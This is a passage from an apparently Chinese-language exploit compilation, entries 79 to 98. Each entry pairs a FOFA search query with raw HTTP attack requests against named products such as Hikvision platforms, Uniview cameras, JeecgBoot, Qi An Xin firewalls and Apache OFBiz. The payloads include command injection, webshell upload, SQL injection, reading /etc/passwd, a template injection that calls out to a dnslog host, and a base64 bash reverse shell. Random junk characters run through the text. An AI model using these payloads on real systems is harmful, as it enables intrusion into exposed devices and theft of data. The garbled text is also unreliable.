YsOxWxSvj1KyZow1PTsh98fdu6l2 m8 ?4 {6 P6 w4 k
------YsOxWxSvj1KyZow1PTsh98fdu6l
$ c ^) E8 M' ?6 t! _9 uContent-Disposition: form-data; name="target"
/ c) O) o4 J$ ]: M* [8 h; V" Y/ B
5 v0 J8 a0 L+ Y6 l! f/Applications/SkillDevelopAndEHS/
& Y$ F! n# x9 P& Q------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 _; W z1 f* F5 @1 @( y6 h4 l; b$ g& L
7 N8 l+ S5 R. @& {GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
3 v8 p/ r4 z. L7 r4 [Host: x.x.x.x4 ]) d& B3 W) |3 Z$ b; s; k! W. E
5 D C; U2 D/ [+ C( q' h. M; ?3 A
" m" q+ b0 F5 V& k/ M3 t79. BYTEVALUE 百为流控路由器远程命令执行! S* F$ L& `9 N1 S4 K( q3 N1 ^1 z
FOFA:BYTEVALUE 智能流控路由器
# n7 j4 a4 z _1 \' @0 x) sGET /goform/webRead/open/?path=|id HTTP/1.1
' ?: ^0 w, Z3 ]$ J' [Host:IP P) v. k7 W1 J& {# ]2 _" W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0: `1 a, g7 W) y; r* d, b% Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' v9 h# y: G9 X5 P1 U `3 N9 k
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 J/ x$ U3 s9 Y$ K6 i8 ~5 ^Accept-Encoding: gzip, deflate
) G" a* v0 K) |9 ~Connection: close
W E+ r& ?+ k L& F4 a0 OUpgrade-Insecure-Requests: 1* m8 g- W5 b( T9 P
6 ~3 d4 {3 V9 K# C( h4 L0 n1 b; a3 s! J
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& p4 @# }5 r- P" p6 u+ o" C( P# n) n
FOFA:app="速达软件-公司产品"7 g2 {- Z {- Z" w9 W
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
. I1 [0 ~3 o8 M: C' HHost: x.x.x.x9 C& U, j6 [" q, t8 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ O4 p! E3 X |4 i
Content-Length: 27! \) `$ A% U/ r. u+ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 W; Y& \' R" }% E7 ~Accept-Encoding: gzip, deflate
; P$ A& a( T1 |( R) v" B' wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, T9 y( |- V* }& C/ b7 c
Connection: close
* n! o0 j5 [- ^5 lContent-Type: application/octet-stream! w8 t- Q4 x0 T
Upgrade-Insecure-Requests: 1$ w: K* B) m( z8 [" F2 U% ?2 C
' D" O. ]/ G/ s/ Z<% out.print("oessqeonylzaf");%>
h5 P( e! x g7 U# K5 B! o
n+ K3 Y- \, S% s6 ]" \
+ s5 c) a! R/ I3 K0 R" eGET /xykqmfxpoas.jsp HTTP/1.15 Z; {% ?" j. p# ? J5 P) a( ^( j+ Z7 P
Host: x.x.x.x
: E0 ]. ]1 B: W0 h0 M5 b, lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 W* h4 W t7 f- K
Connection: close5 x# p' i7 C; p; j* r" z' b$ d
Accept-Encoding: gzip
2 w$ w; x: ~" H' N) B6 _8 _! ]7 `1 h7 V6 ^9 r+ a# q
$ [+ m; L9 ^ \ r; u
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
8 r; o! D5 {! i" }7 l, }3 D1 zFOFA:app="uniview-视频监控", Q: M, k; R: ?: v! F: e( ^
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.14 w2 f" W: U s
Host: x.x.x.x$ d5 K) p. f: E( Y4 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 _2 _6 i5 _ b' _9 Q, F. P
Connection: close2 n3 G* f3 L0 Z- v, P2 W& S
Accept-Encoding: gzip% ?& a$ n; f8 D( |
% C& ~- p! r) q; K6 N: ~
x0 _+ a* l; |' E. M- K& e1 ?82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
) a" O( \+ b% a5 qFOFA:app="思福迪-LOGBASE"7 t0 b# V' m! m0 e
POST /bhost/test_qrcode_b HTTP/1.1
1 x3 W2 J& c+ L/ bHost: BaseURL
# k# q6 F( i' x- AUser-Agent: Go-http-client/1.1" F1 Q% `5 Y0 I
Content-Length: 23
1 k% E- C9 u- I: s$ Y& y% ZAccept-Encoding: gzip
# Q s: u7 y/ }3 e: TConnection: close
8 ]$ V# d; t) ?# MContent-Type: application/x-www-form-urlencoded, q, k! m8 z0 _6 ]3 W& ~
Referer: BaseURL
! d8 `; X8 z' l/ ^/ Z" T6 F! O O0 c* v. l* [) `/ X! {
z1=1&z2="|id;"&z3=bhost- z8 B' t; l/ d8 Q9 d) j
; _3 h% f6 V1 {1 p
. _! t0 T# e" i' Z% L; g3 r$ g* \/ b2 O83. JeecgBoot testConnection 远程命令执行- C7 F9 P9 j7 R- f
FOFA:title=="JeecgBoot 企业级低代码平台"
7 o. t% h% l* M- y- _' @- X0 {/ r5 _# |9 a- v
' Q) W0 i9 N6 J: iPOST /jmreport/testConnection HTTP/1.1! X! f+ b$ }% l! O/ U
Host: x.x.x.x
* Q8 [# N/ D7 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) f- |" l. L+ M$ gConnection: close. G" S+ `: O. Q/ a! A. ]
Content-Length: 8881
8 |, q4 }: g s( CAccept-Encoding: gzip. c$ J7 }) H$ `5 F1 H6 p
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
4 V) G+ }3 Y& F1 E4 oContent-Type: application/json8 e, r3 L" g D
/ C) J/ e% }" a4 s3 kPAYLOAD
- e' P6 C2 {& o6 I3 ~6 f5 n
. S* j/ t W A: l4 L, W84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
6 V5 B9 ^8 ^, O' s; M, n, S' b( e2 v0 {FOFA:title=="JeecgBoot 企业级低代码平台"8 {% R. R) w5 U' p" ~8 ~
* k# t% g% r' ]) p8 C1 h
* D7 X9 E, e5 A* k
( Z. \) o2 v8 r+ H$ {! x7 n
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
1 y/ T; S5 J3 l: H1 ^ WHost: 192.168.40.130:8080* ?3 o0 ~( m9 l/ p4 u% [
User-Agent: curl/7.88.1
6 B0 Z# |, u L' g/ z/ [Content-Length: 156
( N8 {" V9 s0 c DAccept: */*
6 T2 d. [8 ~4 H0 F7 V8 |$ VConnection: close
% b5 n% |* v* z' Z1 G( O& y& XContent-Type: application/json
: L9 ?9 Q, S* aAccept-Encoding: gzip
: c" Q5 s5 n$ N/ x$ j1 U2 N+ j* _( v. h
{* ~* R Q; `6 [! ^( j
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
$ o: P9 T; P4 o3 d0 ^ "type": "0"9 F2 E0 X7 s$ W* @4 W, v# i
}
6 L- Z \6 i/ }+ |$ `/ \
5 M+ B' }! [/ R3 [, t o$ [
" ~" _ u f; O' Q( K, B* `85. SysAid On-premise< 23.3.36远程代码执行
+ K$ }3 X) v6 P, e) m- e; i$ n- }CVE-2023-47246
" a4 F; y' ^! h: g" W f& t0 f' jFOFA:body="sysaid-logo-dark-green.png"
! e; H: q4 o, Q8 B, B+ YEXP数据包如下,注入哥斯拉马
+ X1 z; X* E9 z; N" e- E$ KPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.12 w) t4 S$ T6 j B) Y: {" J" E7 G
Host: x.x.x.x
. k! u! B! @' q5 h) X% a! oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" }: W) t8 p4 W1 r" ?' X; rContent-Type: application/octet-stream
2 @. r2 L& T% b6 N! B" O" [3 tAccept-Encoding: gzip
2 G* }! N' i+ q2 t3 |. g$ _2 l& [6 P: Z+ u: T8 C: z2 E
PAYLOAD
# }$ H" ]; D. r( z5 h3 a
\+ d' |6 E1 }; ~5 @回显URL:http://x.x.x.x/userfiles/index.jsp
. i" H. ?: O! a& n& e; N5 q; J
" l" A0 P* j& P9 {7 f; F* Y8 a) U86. 日本tosei自助洗衣机RCE
' T; U0 C% z, zFOFA:body="tosei_login_check.php"
; v' e6 u; J1 D/ w$ G' O( X, R" RPOST /cgi-bin/network_test.php HTTP/1.17 E) |2 w( D }; l6 Z! ?
Host: x.x.x.x
J M4 @9 S$ Y Y @. xUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
; P* I8 B5 [% {- ]! UConnection: close6 }1 Q: z+ h9 ?$ M, _5 s8 Q
Content-Length: 441 l& {& h9 [0 T# [/ }8 l6 J
Accept: */*
% D, B6 g% |" x" P/ Z% `6 lAccept-Encoding: gzip
/ w! L7 p" O/ n' A6 r) pAccept-Language: en0 Z9 t6 X: M+ ]9 d8 h9 k! w! y, p( g
Content-Type: application/x-www-form-urlencoded# M6 X! L3 R2 O5 G
4 Q1 r% {, I, X. B, R! X
host=%0acat${IFS}/etc/passwd%0a&command=ping
0 _5 l0 i* m( l) D' t+ ~" |. B) V* v% p( R
" X; G9 G% O& g0 q% N4 P$ [0 ~ Z9 d87. 安恒明御安全网关aaa_local_web_preview文件上传; ^! ^' `! E% q1 G9 ^
FOFA:title="明御安全网关"
! \- I% y; U0 r; o! CPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
6 k. K0 H8 l( [) e$ qHost: X.X.X.X( z3 V% k. f G+ ]: h- ?- ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 c& ^8 n) d8 r/ ]. {$ Q" G' x; lConnection: close8 a3 E* u9 I4 E# w8 I
Content-Length: 198
$ w+ ^: {; _" T4 i8 rAccept-Encoding: gzip
2 B8 w R( s9 b6 v' _9 CContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
; E6 E; `, u; p% I, X6 |( X, y& W, y E0 w
--qqobiandqgawlxodfiisporjwravxtvd" s/ p* i; q. k8 `
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
1 q/ E+ j S" HContent-Type: text/plain: T$ [0 ]0 [( v: f+ i( D8 n
2 }% [+ d$ \* |0 @! f) u, L
2ZqGNnsjzzU2GBBPyd8AIA7QlDq6 I) L) _9 J2 r6 [4 i$ _
--qqobiandqgawlxodfiisporjwravxtvd--5 n; {( N! O4 ?0 V# W+ I
& h$ b% H5 f. _2 S; x; \3 W% U
3 P2 c$ F9 D! \/ g8 \0 v G/jfhatuwe.php
) ~) J7 k% \4 n9 b( B* G9 P8 F- g b
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
: l# Y3 k# \& t0 A5 Y2 i6 T" PFOFA:title="明御安全网关"
) z0 h t: B5 t9 j/ {GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1- @/ I! B! k0 k" G# T
Host: x.x.x.xx.x.x.x
* Z. ~: t2 i% P/ G8 s; NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.155 L! {7 z4 g6 ^, ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ @5 G4 f9 W, J3 ]4 NAccept-Encoding: gzip, deflate7 @1 ~4 n2 ~' q. I3 \! a) ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! C1 f$ A( \, ?2 E1 Y
Connection: close
) W9 H7 W' z$ c6 `/ o1 r; ]* I% P S: D6 e
" V# N7 M+ k% M- ^
/astdfkhl.php
+ S. w" u: _) m; E' S+ u5 L, I# o: j2 N" s. r
89. 致远互联FE协作办公平台editflow_manager存在sql注入
9 V( S% U. Z Z/ XFOFA:title="FE协作办公平台" || body="li_plugins_download"
C) L/ |8 W' ?' oPOST /sysform/003/editflow_manager.js%70 HTTP/1.1: E" s! h% R3 s& d7 u3 t
Host: x.x.x.x) M% ?; d3 N, U/ R6 i# y1 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 U/ H N+ {3 S+ [5 K& bConnection: close
% ]% M$ K* R5 U: z* hContent-Length: 41
4 y6 H0 |6 a; j( p% A I" R0 MContent-Type: application/x-www-form-urlencoded$ K2 A# x# u, P! a3 Y( e+ O1 o6 t
Accept-Encoding: gzip
8 O! G" z3 B+ g7 R4 B8 h/ _8 I; B/ r3 N% F
option=2&GUID=-1'+union+select+111*222--+3 r6 P" T' B Q) J ~& N; v: v
" \) ?% h7 p0 N4 b, A3 Q
- z3 p1 \1 b- F4 x( c90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
% I* Q; P M4 @3 O p0 rFOFA:icon_hash="-1830859634" v8 u: h% |/ L7 f* \7 X% {3 O
POST /php/ping.php HTTP/1.1
6 G/ U+ ?0 ?0 l+ M0 w" l4 zHost: x.x.x.x2 q5 T- ]; @& M8 b3 V! U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0. f8 B* B$ Z) e' ~
Content-Length: 51# {5 S- g* N7 }$ z6 C% Y* L6 ^
Accept: application/json, text/javascript, */*; q=0.01
# t$ ?" ^; ~' I# y3 }Accept-Encoding: gzip, deflate
' P6 ~" D! P6 H. q) }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. l1 r5 s$ X# L" c( D7 ^4 }Connection: close
( I( {1 ^8 {7 G8 h8 AContent-Type: application/x-www-form-urlencoded% w; H+ R$ S# \* e4 N4 j7 \6 @6 H
X-Requested-With: XMLHttpRequest
& |& Z; _! V: N+ U* [3 Y* j+ y6 B: [
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
2 N+ ^3 U- s! _3 C2 T1 o
: [5 Z8 W9 d# L4 ^) m7 j
' C/ e! ?1 i9 m91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取+ b1 K' r; K$ A3 M2 x* T
FOFA:title="综合安防管理平台"* j3 }9 T9 q w Z- V
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.13 M# v! }2 n) w: a1 u( r
Host: your-ip
: O. @; d0 y. U( ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.360 ^* Z6 N: J s. N
Accept-Encoding: gzip, deflate; Q$ |$ u5 k! I2 Y- x _2 t) b8 M
Accept: */*
: g( |- \) Y8 Q6 I5 b+ IConnection: keep-alive! e' B2 L+ t9 B
2 ?9 n: G ~5 u& n1 U6 K% i
+ @' O& ` Q+ F
, {4 I( ^6 P# B. l. m! d
92. 海康威视运行管理中心session命令执行
9 l4 M) U% A) s% X6 T/ nFastjson命令执行
u" D5 s- @+ i* Ohunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"" M5 D9 n3 E3 y+ {
POST /center/api/session HTTP/1.17 e) E& z o( H* T. X
Host:, d7 j% w5 _6 k! A/ [2 G" D- b- Q
Accept: application/json, text/plain, */*: |1 z% E8 B% i% {4 O. z! ~1 b
Accept-Encoding: gzip, deflate
L* x. q. b) F" P' uX-Requested-With: XMLHttpRequest3 V5 G8 v7 K" ?7 Z/ x6 S1 W4 J
Content-Type: application/json;charset=UTF-8
, S" k# w" U4 v2 M. `) s" YX-Language-Type: zh_CN3 F, T4 o' z1 W: h0 B1 S
Testcmd: echo test
6 ~, b& k) ?: F# g) zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
, d( A7 r' O2 n: p1 |" ]* |- TAccept-Language: zh-CN,zh;q=0.97 F) Y6 N/ l; I& c- L
Content-Length: 5778' d7 r" e# @1 F+ ]0 X8 o
+ h D2 B! x Q( i! z, t$ q, ~3 c, kPAYLOAD
7 c5 H R, b! `
0 h2 ?1 [( R- h$ t/ r
: M' M& H% p9 {; N& V93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
. C- T- E1 v$ JFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
. G/ g- u: J" w( A4 jPOST /?g=app_av_import_save HTTP/1.1
+ h) @$ J+ F% O9 SHost: x.x.x.x5 {; |! z1 Q, q t- @: a3 u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx& l! X- s( L5 ?6 a# k2 G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.368 K5 I: G% ?0 l( s- a# B2 |" @1 K
3 h; ~2 j9 ~; q- i
------WebKitFormBoundarykcbkgdfx
" s, Y3 A* ^7 H8 m7 V- l1 B( M7 X cContent-Disposition: form-data; name="MAX_FILE_SIZE"8 O. u" p: E3 v r3 G. l
) E% S( x1 V M8 o; e
100000007 s7 j9 f+ G5 p5 `
------WebKitFormBoundarykcbkgdfx
* \5 N7 m7 H) E0 YContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
" x ~: C/ \' ?2 u! i5 fContent-Type: text/plain
) Y: r1 e2 Z7 [
: x9 r; d9 Z. r. w% C4 C: W5 o2 awagletqrkwrddkthtulxsqrphulnknxa
5 A/ f2 B J/ X& h' B+ K! w' `------WebKitFormBoundarykcbkgdfx
`) m8 u3 D8 |8 yContent-Disposition: form-data; name="submit_post"+ z. C" C" f. d, E5 g+ ^
- e T+ i' O* ~3 p( ?. e- gobj_app_upfile
( t* O/ Q5 L2 Q8 d1 l------WebKitFormBoundarykcbkgdfx
, m+ w) ]; ~7 W3 f1 LContent-Disposition: form-data; name="__hash__"5 G* r8 ^: p0 `. b5 {
) \" b! Q( F" S+ F8 Y& _: `) Q
0b9d6b1ab7479ab69d9f71b05e0e9445
9 f6 O2 H2 _8 X. W( [' @------WebKitFormBoundarykcbkgdfx--0 i9 x9 A/ P. B2 u
! `" M4 Z& h$ x1 ?8 F
, e5 ^+ X( q H6 A U
GET /attachements/xlskxknxa.txt HTTP/1.1& P4 X7 [& y1 {6 R2 D, l
Host: xx.xx.xx.xx
3 c, u" W0 |5 b) I+ J3 I% UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.365 v$ _" K; P7 o+ x1 C
( T7 d, I# C! @- Q3 j* f: ~5 c; t9 I1 A6 p- A
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传* z" G+ Y+ j* c: w' a+ c4 a
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
( y, I( {& n* y0 Z8 R$ a' HPOST /?g=obj_area_import_save HTTP/1.18 S% x, h# ~( G) S+ [( \
Host: x.x.x.x2 X) R. _3 M* ?/ n- C. n: X1 b6 ?
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt- ]: G& \, F, q0 v- b3 I$ ]- x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- k' ^4 J- P' {# y3 C, f1 A# n7 n: t e) t. B" O$ k; ~
------WebKitFormBoundarybqvzqvmt
5 X& s; L/ z _! P, \Content-Disposition: form-data; name="MAX_FILE_SIZE": |# l8 R% b- ]7 J0 z- a- A, D; _
4 Y0 h! T- h+ P9 X! K# a: L100000004 `7 \/ q- `& e1 `3 a
------WebKitFormBoundarybqvzqvmt
6 b( X* S5 I% b' I" c$ U. O- nContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"* i% G6 g$ J1 ~; x B: B
Content-Type: text/plain2 r( {" V/ y0 D
; t! f. i, r! m% d# a6 b
pxplitttsrjnyoafavcajwkvhxindhmu G8 W9 N' P4 M0 d4 D
------WebKitFormBoundarybqvzqvmt
. _( P @+ e2 QContent-Disposition: form-data; name="submit_post"
/ K' V0 M7 m+ Q" G( w! _' v
. [$ Y6 C9 Z3 p* g* ]obj_app_upfile* r1 ^* c" R3 g! ]5 Y- F
------WebKitFormBoundarybqvzqvmt, }4 L- p& R- h/ ]
Content-Disposition: form-data; name="__hash__"
% T. R( b- F3 C" p* _+ H* j" w) G( j
' F, R+ b2 K" Q! l4 O6 U0b9d6b1ab7479ab69d9f71b05e0e9445
) F/ I4 ^3 b- ?1 B7 }------WebKitFormBoundarybqvzqvmt--9 |( H1 G3 w. j1 K- s
% I+ A, a3 }% N, z- m' e' l! {) W% R3 e0 J
+ E( j2 B- M3 K; NGET /attachements/xlskxknxa.txt HTTP/1.1: q' D# r) [) N8 q3 \
Host: xx.xx.xx.xx
$ |: @" E8 E- k/ `( R- M4 Q$ qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# {6 i5 l7 ]& M2 z
; W! T0 D3 I1 g1 H
! B+ b j2 o. k% R5 h7 h" i7 A# D
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
/ `' n( V. g* W9 }CVE-2023-49070
- E+ N3 k1 w CFOFA:app="Apache_OFBiz"
0 M1 t; H3 b* {% |( yPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" s/ a& T, U$ W+ t
Host: x.x.x.x9 b `' Q" r! s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
8 }& ]# C+ s v) D. q; O3 L7 \Connection: close
& R, L) P# A. A2 y5 tContent-Length: 889
o* j: H9 E0 l c) c" XContent-Type: application/xml% _; Q! V6 @- O0 U4 E5 c
Accept-Encoding: gzip
5 B+ J1 R f; C$ g
% M5 I1 c% e, }% s1 E+ Q% ]<?xml version="1.0"?> H1 C3 A) U5 o0 Z) i% |" z# v
<methodCall>) _6 u* z4 l4 Z2 [
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>( G+ v5 C$ z4 O/ o4 `( m
<params>$ V) x3 L# o8 p
<param>- Y/ }6 n g( O" X8 t
<value>
9 w7 |* N5 s: \7 {# ] <struct>2 V- r- r2 a1 @, E+ @, q
<member>
4 `; {+ h3 i2 s* P <name>test</name>8 ?4 V( R% I, N" {
<value>3 k0 | \. E: [* H
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>: b# h( E" Q& B7 b
</value>
2 Q' K( ~* T& P+ T; E </member>
8 [9 X! p! E5 e6 E( D </struct>
; B' G' G! m9 w" `4 f% s </value>
! ~& B5 n8 F5 t8 E) B </param>3 k/ G2 X. u+ e
</params>
) t6 R! ~9 I, M& n ?1 p$ _</methodCall>' B9 |9 p+ b' Z' h; v$ C
5 {2 c* D" ` U$ Y9 {& e
9 ]9 }+ o* r: G! I用ysoserial生成payload
6 p$ P. K: C! r8 Qjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
H! @0 w& ^' o0 B# d" e. `+ c
6 {" G- _6 C; l" n; S
5 ?6 P& J% ?2 w+ W: H将生成的payload替换到上面的POC9 s% J1 d) s9 A X1 h* i( J
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1' U5 Q" F) L7 J5 c3 v
Host: 192.168.40.130:8443# R- ^* \8 r( E( [7 ]4 g) ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
' R* [ g" k0 Q) c! T( @9 P, tConnection: close: X6 X# k! y# n# K
Content-Length: 8895 a- I8 X' ^ x- M5 H
Content-Type: application/xml1 \- a4 g- H# f6 Z5 x5 D
Accept-Encoding: gzip
& o# ]& S) Q( x& V: a
, y, |: _% ?% T3 ~& k* ^PAYLOAD) X* c( o! z5 `' R! q3 k
5 X0 a/ [% W5 I$ @ B; g96. Apache OFBiz 18.12.11 groovy 远程代码执行
! _: a4 `$ r; n6 n: U( X, IFOFA:app="Apache_OFBiz"5 ^! a* L- B7 I9 B7 n- v6 C, m9 w4 F
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
% Y3 {5 ~2 D5 m8 |' ?Host: localhost:8443& E6 Y3 \ s: q2 s* | U; W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
9 W. A& [- F; s6 s* m6 k+ H+ MAccept: */*
4 y) M g, w$ s4 @1 y( R P Y1 t6 mAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; c9 h+ S S2 i, a6 ]7 VContent-Type: application/x-www-form-urlencoded
6 Y& f4 F! n- l/ \$ u- vContent-Length: 55
' U: @; P: L; M# K" {
, u9 Y: x( R* N" |" H; zgroovyProgram=throw+new+Exception('id'.execute().text);0 D6 m2 F; ^( O E& ~! ?! Y
. g1 o! t6 A+ }( V. e5 a% k: S
+ ^ Q- Q4 S3 Z- m) n6 w W& L
反弹shell
, `( k( S" T" S$ ~在kali上启动一个监听
8 ^; L' q6 N2 h4 M/ d' Anc -lvp 7777 N% i# V0 v1 Z5 I* B
7 l3 D7 w. H7 r1 B
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1! F2 |' j, ]8 L" T
Host: 192.168.40.130:8443
0 i$ ]% q! P% w" @0 vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, f8 F* q7 W2 p4 W, L! s+ P
Accept: */* \0 [! b$ }* }5 W y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; Z3 r! o p. wContent-Type: application/x-www-form-urlencoded
6 f* [6 P6 Z u3 b" u- {( d4 [" p( DContent-Length: 71
( z$ F+ C3 I$ X& J: A2 ^4 T$ A& W
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();- r$ x: X* z7 M# O5 G% t
, w1 u" e1 H- k97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
9 b9 q' a! e, p8 z# aFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
2 j5 N4 T0 s HGET /passport/login/ HTTP/1.1
8 N! ` L! e9 Q, n2 BHost: 192.168.40.130:80857 R9 o3 i6 B0 K. F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. s& H. \- L* l& h4 m- WAccept-Encoding: gzip
" U6 w) p( h; ~: W+ \Connection: close; m' y, x$ h% b& w0 v& G
Cookie: rememberMe=PAYLOAD! j7 r& v! d3 L9 c8 B2 {3 ]
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
( X( k" C) y& f8 h
! z( v2 B6 n! G: z7 H
9 U# \! k) ?! I+ x' A5 x# }98. SpiderFlow爬虫平台远程命令执行
1 U: _1 m+ G# ?- H5 W8 ^+ j, ?CVE-2024-0195
- p$ {3 B" X. Y3 }6 TFOFA:app="SpiderFlow"7 e! o* s! H( |* G; n& A
POST /function/save HTTP/1.1
/ m2 g3 ~5 w, ]8 f- K+ bHost: 192.168.40.130:8088
: j) v: Y4 [) _: aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
3 F! V9 K q% m& J D8 o# @7 K9 IConnection: close
) J) w+ z$ ~2 |6 t: D* wContent-Length: 1213 J2 _/ V0 f, a# D1 r1 |# {
Accept: */*
